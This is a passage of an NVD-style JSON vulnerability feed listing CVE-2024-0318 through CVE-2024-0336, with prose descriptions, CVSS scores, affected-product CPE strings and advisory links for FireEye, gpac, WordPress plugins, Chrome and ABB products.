'Hostname/IP' parameters that will be triggered when items are loaded." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fireeye:hxtool:4.6:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-15T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0319", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Open Redirect vulnerability in FireEye HXTool affecting version 4.6, the exploitation of which could allow an attacker to redirect a legitimate user to a malicious page by changing the 'redirect_uri' parameter." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fireeye:hxtool:4.6:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-15T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0320", "ASSIGNER" : "cve-coordination@incibe.es" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "name" : "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fireeye-products", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Cross-Site Scripting in FireEye Malware Analysis (AX) affecting version 9.0.3.936530. This vulnerability allows an attacker to send a specially crafted JavaScript payload in the application URL to retrieve the session details of a legitimate user." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fireeye:malware_analysis:9.0.3.936530:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-15T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0321", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/gpac/gpac/commit/d0ced41651b279bb054eb6390751e2d4eb84819a", "name" : "https://github.com/gpac/gpac/commit/d0ced41651b279bb054eb6390751e2d4eb84819a", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/gpac/gpac/commit/d0ced41651b279bb054eb6390751e2d4eb84819a", "name" : "https://github.com/gpac/gpac/commit/d0ced41651b279bb054eb6390751e2d4eb84819a", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/4c027b94-8e9c-4c31-a169-893b25047769", "name" : "https://huntr.com/bounties/4c027b94-8e9c-4c31-a169-893b25047769", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/4c027b94-8e9c-4c31-a169-893b25047769", "name" : "https://huntr.com/bounties/4c027b94-8e9c-4c31-a169-893b25047769", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Stack-based Buffer Overflow in GitHub repository gpac/gpac prior to 2.3-DEV." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.3.0-dev", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T13:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0322", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/gpac/gpac/commit/092904b80edbc4dce315684a59cc3184c45c1b70", "name" : "https://github.com/gpac/gpac/commit/092904b80edbc4dce315684a59cc3184c45c1b70", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/gpac/gpac/commit/092904b80edbc4dce315684a59cc3184c45c1b70", "name" : "https://github.com/gpac/gpac/commit/092904b80edbc4dce315684a59cc3184c45c1b70", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/87611fc9-ed7c-43e9-8e52-d83cd270bbec", "name" : "https://huntr.com/bounties/87611fc9-ed7c-43e9-8e52-d83cd270bbec", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://huntr.com/bounties/87611fc9-ed7c-43e9-8e52-d83cd270bbec", "name" : "https://huntr.com/bounties/87611fc9-ed7c-43e9-8e52-d83cd270bbec", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Out-of-bounds Read in GitHub repository gpac/gpac prior to 2.3-DEV." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.3.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gpac:gpac:2.3.0:dev:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 9.1, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.2 } }, "publishedDate" : "2024-01-08T13:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0323", "ASSIGNER" : "cybersecurity@ch.abb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.br-automation.com/fileadmin/SA23P004_FTP_uses_unsecure_encryption_mechanisms-f57c147c.pdf", "name" : "https://www.br-automation.com/fileadmin/SA23P004_FTP_uses_unsecure_encryption_mechanisms-f57c147c.pdf", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.br-automation.com/fileadmin/SA23P004_FTP_uses_unsecure_encryption_mechanisms-f57c147c.pdf", "name" : "https://www.br-automation.com/fileadmin/SA23P004_FTP_uses_unsecure_encryption_mechanisms-f57c147c.pdf", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The FTP server used on the B&R\nAutomation Runtime supports unsecure encryption mechanisms, such as SSLv3,\nTLSv1.0 and TLS1.1. An network-based attacker can exploit the flaws to conduct\nman-in-the-middle attacks or to decrypt communications between the affected product\nclients." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:br-automation:automation_runtime:*:*:*:*:*:*:*:*", "versionEndIncluding" : "i4.93", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-05T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0324", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/WordpressPluginDirectory/profile-builder/blob/main/profile-builder/admin/admin-functions.php#L517", "name" : "https://github.com/WordpressPluginDirectory/profile-builder/blob/main/profile-builder/admin/admin-functions.php#L517", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://github.com/WordpressPluginDirectory/profile-builder/blob/main/profile-builder/admin/admin-functions.php#L517", "name" : "https://github.com/WordpressPluginDirectory/profile-builder/blob/main/profile-builder/admin/admin-functions.php#L517", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3022354/", "name" : "https://plugins.trac.wordpress.org/changeset/3022354/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3022354/", "name" : "https://plugins.trac.wordpress.org/changeset/3022354/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wppb_two_factor_authentication_settings_update' function in all versions up to, and including, 3.10.8. This makes it possible for unauthenticated attackers to enable or disable the 2FA functionality present in the Premium version of the plugin for arbitrary user roles." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.10.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-05T22:15Z", "lastModifiedDate" : "2025-05-15T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0325", "ASSIGNER" : "security@perforce.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-77" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://perforce.com", "name" : "https://perforce.com", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://perforce.com", "name" : "https://perforce.com", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Helix Sync versions prior to 2024.1, a local command injection was identified. Reported by Bryan Riggins.  \n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:perforce:helix_sync:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2024.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-01T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0326", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/includes/class-premium-template-tags.php#L1638", "name" : "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/includes/class-premium-template-tags.php#L1638", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/includes/class-premium-template-tags.php#L1638", "name" : "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/includes/class-premium-template-tags.php#L1638", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php#L173", "name" : "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php#L173", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php#L173", "name" : "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php#L173", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/widgets/premium-button.php#L1709", "name" : "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/widgets/premium-button.php#L1709", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/widgets/premium-button.php#L1709", "name" : "https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/trunk/widgets/premium-button.php#L1709", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php", "name" : "https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php", "name" : "https://plugins.trac.wordpress.org/changeset/3022824/premium-addons-for-elementor/trunk/modules/premium-wrapper-link/module.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/22ba0eaf-f514-420a-9680-8126f6dcdde9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/22ba0eaf-f514-420a-9680-8126f6dcdde9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/22ba0eaf-f514-420a-9680-8126f6dcdde9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/22ba0eaf-f514-420a-9680-8126f6dcdde9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Link Wrapper functionality in all versions up to, and including, 4.10.17 due to insufficient input sanitization and output escaping on user supplied links. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "4.10.18", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-01-08T18:33Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0333", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_9.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_9.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_9.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_9.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://crbug.com/1513379", "name" : "https://crbug.com/1513379", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1513379", "name" : "https://crbug.com/1513379", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4BXC7FJIAZRY3P72XC4Z4UOW2QDA7YX7/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4BXC7FJIAZRY3P72XC4Z4UOW2QDA7YX7/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4BXC7FJIAZRY3P72XC4Z4UOW2QDA7YX7/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4BXC7FJIAZRY3P72XC4Z4UOW2QDA7YX7/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IPYCYENYQYADCOS6XG4JITUVRZ6HTE2B/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IPYCYENYQYADCOS6XG4JITUVRZ6HTE2B/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IPYCYENYQYADCOS6XG4JITUVRZ6HTE2B/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IPYCYENYQYADCOS6XG4JITUVRZ6HTE2B/", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Insufficient data validation in Extensions in Google Chrome prior to 120.0.6099.216 allowed an attacker in a privileged network position to install a malicious extension via a crafted HTML page. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "120.0.6099.216", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.6, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-10T22:15Z", "lastModifiedDate" : "2025-06-03T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0334", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3077328/jeg-elementor-kit", "name" : "https://plugins.trac.wordpress.org/changeset/3077328/jeg-elementor-kit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3077328/jeg-elementor-kit", "name" : "https://plugins.trac.wordpress.org/changeset/3077328/jeg-elementor-kit", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/950e9042-1364-4200-8f57-171346075764?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/950e9042-1364-4200-8f57-171346075764?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/950e9042-1364-4200-8f57-171346075764?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/950e9042-1364-4200-8f57-171346075764?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom attribute of a link in several Elementor widgets in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:jegtheme:jeg_elementor_kit:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.6.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-05-01T13:15Z", "lastModifiedDate" : "2025-01-15T18:09Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0335", "ASSIGNER" : "cybersecurity@ch.abb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://search.abb.com/library/Download.aspx?DocumentID=7PAA002536&LanguageCode=en&DocumentPartId=&Action=Launch", "name" : "https://search.abb.com/library/Download.aspx?DocumentID=7PAA002536&LanguageCode=en&DocumentPartId=&Action=Launch", "refsource" : "", "tags" : [ ] }, { "url" : "https://search.abb.com/library/Download.aspx?DocumentID=7PAA002536&LanguageCode=en&DocumentPartId=&Action=Launch", "name" : "https://search.abb.com/library/Download.aspx?DocumentID=7PAA002536&LanguageCode=en&DocumentPartId=&Action=Launch", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "ABB has internally identified a vulnerability in the ABB VPNI feature of the S+ Control API component which may \nbe used by several Symphony Plus products (e.g., S+ Operations, S+ Engineering and S+ Analyst)\n\n\nThis issue affects Symphony Plus S+ Operations: from 3..0;0 through 3.3 SP1 RU4, from 2.1;0 through 2.1 SP2 RU3, from 2.0;0 through 2.0 SP6 TC6; Symphony Plus S+ Engineering: from 2.1 through 2.3 RU3; Symphony Plus S+ Analyst: from 7.0.0.0 through 7.2.0.2." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-03T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0336", "ASSIGNER" : "cve@usom.gov.tr" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.usom.gov.tr/bildirim/tr-24-0600", "name" : "https://www.usom.gov.tr/bildirim/tr-24-0600", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.usom.gov.tr/bildirim/tr-24-0600", "name" : "https://www.usom.gov.tr/bildirim/tr-24-0600", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper Access Control vulnerability in EMTA Grup PDKS allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PDKS: before 20240603. \n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-06-03T14:15Z", "lastModifiedDate" : 